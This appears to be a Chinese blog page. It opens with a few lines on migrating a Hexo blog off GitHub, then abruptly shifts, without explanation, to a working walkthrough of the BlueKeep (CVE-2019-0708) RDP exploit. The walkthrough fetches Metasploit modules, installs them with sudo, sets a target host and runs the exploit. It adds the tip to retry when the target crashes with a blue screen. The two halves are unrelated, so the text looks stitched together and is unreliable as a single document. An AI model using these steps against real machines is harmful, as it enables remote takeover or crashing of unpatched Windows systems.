为什么要移植
一直用hexo托管在Github上有几点体验不要好的地方
- 没有评论系统,虽然有很多插件,但是不能及时的通知提醒
- 写博客体验比较不好,虽说这种方式比较极客,Markdown本身语法比较简单,有些复杂的排版需要用html标签来实现,比较难受
- 没有后台管理系统,全靠git来管理,方式较极客,但不友好
- 更新博客之后需要刷新两次才能更新页面
综上,当时跟风的我现在苦逼的将博客全手工移植到来这里,😢
1 2 3 4 5 6 7 8 9 10 11 | # Download wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb # Replace sudo cp rdp.rb /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb sudo cp rdp_scanner.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb sudo cp cve_2019_0708_bluekeep.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb sudo cp cve_2019_0708_bluekeep_rce.rb /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb |
msfconsole
reload_all
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf
基本操作info
set RHOSTS <target ip>
target
1 2 3 4 5 6 7 8 9 | Exploit targets: Id Name -- ---- 0 Automatic targeting via fingerprinting 1 Windows 7 SP1 / 2008 R2 (6.1.7601 x64) 2 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox) 3 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare) 4 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V) |
run
,遇到蓝屏 多试几次 或者 是哪一步配置出错